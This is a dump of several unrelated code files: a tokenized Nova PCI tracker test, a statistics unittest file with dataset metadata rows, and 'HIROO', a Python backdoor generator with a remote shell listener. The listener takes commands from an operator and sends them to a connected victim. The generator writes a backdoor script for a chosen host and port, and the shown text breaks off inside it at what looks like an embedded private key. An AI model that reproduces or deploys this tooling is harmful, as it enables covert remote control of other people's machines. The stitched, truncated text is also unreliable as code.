op|'('
name|'fake_pci_2'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_v3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'update_called'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'save'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'update_called'
op|','
number|'3'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_save_removed
dedent|''
name|'def'
name|'test_save_removed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.db.pci_device_update'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_pci_device_update'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.db.pci_device_destroy'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_pci_device_destroy'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'destroy_called'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'dev'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'update_called'
op|'='
number|'0'
newline|'\n'
name|'dev'
op|'.'
name|'remove'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'save'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'destroy_called'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_clean_usage
name|'def'
name|'test_clean_usage'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst_2'
op|'='
name|'copy'
op|'.'
name|'copy'
op|'('
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'inst_2'
op|'.'
name|'uuid'
op|'='
name|'uuidsentinel'
op|'.'
name|'instance2'
newline|'\n'
name|'migr'
op|'='
op|'{'
string|"'instance_uuid'"
op|':'
string|"'uuid2'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
name|'orph'
op|'='
op|'{'
string|"'uuid'"
op|':'
string|"'uuid3'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'inst_2'
op|'.'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'inst_2'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|','
string|"'v'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'clean_usage'
op|'('
op|'['
name|'self'
op|'.'
name|'inst'
op|']'
op|','
op|'['
name|'migr'
op|']'
op|','
op|'['
name|'orph'
op|']'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
name|'dev'
name|'in'
name|'free_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_clean_usage_claims
name|'def'
name|'test_clean_usage_claims'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst_2'
op|'='
name|'copy'
op|'.'
name|'copy'
op|'('
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'inst_2'
op|'.'
name|'uuid'
op|'='
name|'uuidsentinel'
op|'.'
name|'instance2'
newline|'\n'
name|'migr'
op|'='
op|'{'
string|"'instance_uuid'"
op|':'
string|"'uuid2'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
name|'orph'
op|'='
op|'{'
string|"'uuid'"
op|':'
string|"'uuid3'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'inst_2'
op|'.'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'inst_2'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'clean_usage'
op|'('
op|'['
name|'self'
op|'.'
name|'inst'
op|']'
op|','
op|'['
name|'migr'
op|']'
op|','
op|'['
name|'orph'
op|']'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
name|'dev'
name|'in'
name|'free_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_clean_usage_no_request_match_no_claims
name|'def'
name|'test_clean_usage_no_request_match_no_claims'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
comment|'# Tests the case that there is no match for the request so the'
nl|'\n'
comment|'# claims mapping is set to None for the instance when the tracker'
nl|'\n'
comment|'# calls clean_usage.'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'instance'
op|'='
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'3'
op|','
name|'len'
op|'('
name|'free_devs'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'clean_usage'
op|'('
op|'['
op|']'
op|','
op|'['
op|']'
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'3'
op|','
name|'len'
op|'('
name|'free_devs'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'address'
name|'for'
name|'dev'
name|'in'
name|'free_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'0000:00:00.1'"
op|','
string|"'0000:00:00.2'"
op|','
string|"'0000:00:00.3'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_free_devices
name|'def'
name|'test_free_devices'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
nl|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'free_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|PciGetInstanceDevs
dedent|''
dedent|''
name|'class'
name|'PciGetInstanceDevs'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|member|test_get_devs_object
indent|' '
name|'def'
name|'test_get_devs_object'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|_fake_obj_load_attr
indent|' '
name|'def'
name|'_fake_obj_load_attr'
op|'('
name|'foo'
op|','
name|'attrname'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'attrname'
op|'=='
string|"'pci_devices'"
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'load_attr_called'
op|'='
name|'True'
newline|'\n'
name|'foo'
op|'.'
name|'pci_devices'
op|'='
name|'objects'
op|'.'
name|'PciDeviceList'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.objects.Instance.obj_load_attr'"
op|','
nl|'\n'
name|'_fake_obj_load_attr'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'load_attr_called'
op|'='
name|'False'
newline|'\n'
name|'manager'
op|'.'
name|'get_instance_pci_devs'
op|'('
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'load_attr_called'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 11.865019
| 88
| 0.59599
| 6,737
| 43,687
| 3.734452
| 0.039632
| 0.203903
| 0.090226
| 0.121308
| 0.906395
| 0.884972
| 0.851385
| 0.815811
| 0.770102
| 0.732501
| 0
| 0.008641
| 0.094033
| 43,687
| 3,681
| 89
| 11.868242
| 0.627024
| 0
| 0
| 0.961967
| 0
| 0
| 0.35015
| 0.05544
| 0
| 0
| 0
| 0
| 0.013855
| 0
| null | null | 0
| 0.00326
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b6773d189828b7bc1f103144fecd56c47b4aec84
| 7,130
|
py
|
Python
|
Tests/test_Statistics.py
|
mykolatyniv/database_NJIT601
|
f4805c1ed35e5428c107de7311f97bd16fb3298f
|
[
"MIT"
] | null | null | null |
Tests/test_Statistics.py
|
mykolatyniv/database_NJIT601
|
f4805c1ed35e5428c107de7311f97bd16fb3298f
|
[
"MIT"
] | null | null | null |
Tests/test_Statistics.py
|
mykolatyniv/database_NJIT601
|
f4805c1ed35e5428c107de7311f97bd16fb3298f
|
[
"MIT"
] | 2
|
2019-11-03T15:16:13.000Z
|
2019-11-16T02:13:42.000Z
|
import unittest
from Statistics.Statistics import Statistics
from CsvReader.CsvReader import CsvReader
from pprint import pprint
class MyTestCase(unittest.TestCase):
def setUp(self) -> None:
self.statistics = Statistics()
def test_instantiate_calculator(self):
self.assertIsInstance(self.statistics, Statistics)
def test_population_mean(self):
test_data = CsvReader("Tests/Data/mean.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.mean(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_median(self):
test_data = CsvReader("Tests/Data/median.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.med(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'], row['Value 5'], row['Value 6']), result)
self.assertEqual(self.statistics.result, result)
def test_mode(self):
test_data = CsvReader("Tests/Data/mode.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.mod(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.statistics.result, result)
def test_population_standard_deviation(self):
test_data = CsvReader("Tests/Data/devi.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.population(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.statistics.result, result)
def test_variance_of_population_proportion(self):
test_data = CsvReader("Tests/Data/variance.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.variance(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.statistics.result, result)
def test_z_score(self):
test_data = CsvReader("Tests/Data/score.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.score(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_standardized_score(self):
test_data = CsvReader("Tests/Data/score_1.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.standardized(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_correlation_coefficient(self):
test_data = CsvReader("Tests/Data/corr_coef.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.corr_coef(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_confidence_interval(self):
test_data = CsvReader("Tests/Data/conf_inter.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.confidence(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_population_variance(self):
test_data = CsvReader("Tests/Data/pop_var.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.pop_var(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_p_value(self):
test_data = CsvReader("Tests/Data/p_value.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.value(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4']), result)
self.assertEqual(self.statistics.result, result)
def test_proportion(self):
test_data = CsvReader("Tests/Data/propor.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.propor(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_sample_mean(self):
test_data = CsvReader("Tests/Data/samp_mean.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.samp_mean(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_sample_standard_deviation(self):
test_data = CsvReader("Tests/Data/samp_stan_dev.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.stan_dev(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(float(self.statistics.result), result)
def test_variance_of_sample_proportion(self):
test_data = CsvReader("Tests/Data/var_samp_propor.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.var_samp_propor(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_results_property(self):
self.assertEqual(self.statistics.result, 0)
if __name__ == '__main__':
unittest.main()
| 46.601307
| 152
| 0.591024
| 881
| 7,130
| 4.662883
| 0.085131
| 0.157741
| 0.153359
| 0.211782
| 0.876095
| 0.852483
| 0.808666
| 0.760954
| 0.705696
| 0.679406
| 0
| 0.016871
| 0.268443
| 7,130
| 152
| 153
| 46.907895
| 0.770706
| 0
| 0
| 0.539063
| 0
| 0
| 0.145722
| 0.036746
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.140625
| false
| 0
| 0.03125
| 0
| 0.179688
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e0887a0e1375fa1021299f09f335ea64134e865
| 69
|
py
|
Python
|
koh_api/__init__.py
|
csteamengine/se329_project_1
|
35e9fac3880292ab2337f55ab5298ee10cea34bd
|
[
"BSD-3-Clause"
] | null | null | null |
koh_api/__init__.py
|
csteamengine/se329_project_1
|
35e9fac3880292ab2337f55ab5298ee10cea34bd
|
[
"BSD-3-Clause"
] | null | null | null |
koh_api/__init__.py
|
csteamengine/se329_project_1
|
35e9fac3880292ab2337f55ab5298ee10cea34bd
|
[
"BSD-3-Clause"
] | null | null | null |
from koh_api.koh_face_recognizer import *
from koh_api.util import *
| 23
| 41
| 0.826087
| 12
| 69
| 4.416667
| 0.583333
| 0.264151
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115942
| 69
| 2
| 42
| 34.5
| 0.868852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1e12852f7ee7b3e801b535981b7cc0ab1f0d712e
| 248,621
|
py
|
Python
|
HIROO.py
|
E-RROR/HIROO
|
e975157903d1acd5127191f6f25d614177facf46
|
[
"MIT"
] | 13
|
2018-12-22T09:02:55.000Z
|
2021-07-16T05:15:49.000Z
|
HIROO.py
|
cinaaaa/HIROO
|
e975157903d1acd5127191f6f25d614177facf46
|
[
"MIT"
] | null | null | null |
HIROO.py
|
cinaaaa/HIROO
|
e975157903d1acd5127191f6f25d614177facf46
|
[
"MIT"
] | 5
|
2019-07-11T04:01:49.000Z
|
2021-07-16T05:55:00.000Z
|
import socket
import os
os.system('clear')
class bcolors:
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
print(bcolors.OKGREEN+"""
______________
| HIROO |____
| Python | _ |_
* | --- Shell | |_| |
* |______________|_____|
|_| |_|
Code By E-RROR
""")
print (" ")
print (" ")
print (bcolors.WARNING+"IF YOU WANT TO CREATE SHELL SEND 1")
print (" ")
print " ----------------------------------------*****"
print (" ")
print (bcolors.WARNING+"IF YOU WANT TO START LISTENING SEND 2")
print (" ")
print (" ")
print (" ")
input1 = raw_input(bcolors.ENDC+">>>>>>> ")
print(" ")
def listen():
porttolisten = int(input(bcolors.WARNING+"SEND THE PORT TO LISTEN ON >>> "))
def writer(obj):
fir = obj.replace("write","")
firs = fir.replace(" ","")
ads = str(open(firs,"r").readlines())
c.send(ads)
data = 0
def download(obj):
obj1 = obj.replace('download','')
obj2 = obj1.replace(' ','')
with open(obj2, 'wb') as f:
print 'file opened'
while True:
print('receiving data...')
if not data:
break
# write data to a file
f.write(data)
f.close()
print("STARTING .......... ")
print " "
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print bcolors.OKGREEN+"|+|"
port = porttolisten
s.bind(('0.0.0.0', port))
print bcolors.OKGREEN+"socket binded to %s" %(port)
s.listen(5)
print(bcolors.OKGREEN+"Waiting For Connection ... ")
c, addr = s.accept()
print 'Get Connection from | ', addr
while True:
shell = raw_input(bcolors.OKGREEN + " Shell >>> ")
c.send(shell)
data = c.recv(20048)
if shell == "exit":
break;
if data:
print data
def createshell():
print(bcolors.WARNING+"OK LETS ME ASKS SOME QUESTIONS")
print " "
name= raw_input(bcolors.WARNING+"SEND ME A NAME FOR BACKDOOR >>>>> ")
print " "
host= raw_input(bcolors.WARNING+"SEND ME THE HOST IP (LOCAL OR GLOBAL) >>>>> ")
print " "
port= int(input(bcolors.WARNING+"SEND ME THE PORT >>>>> "))
print " "
f = open("%s.py"%(name),"w+")
f.write("""
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
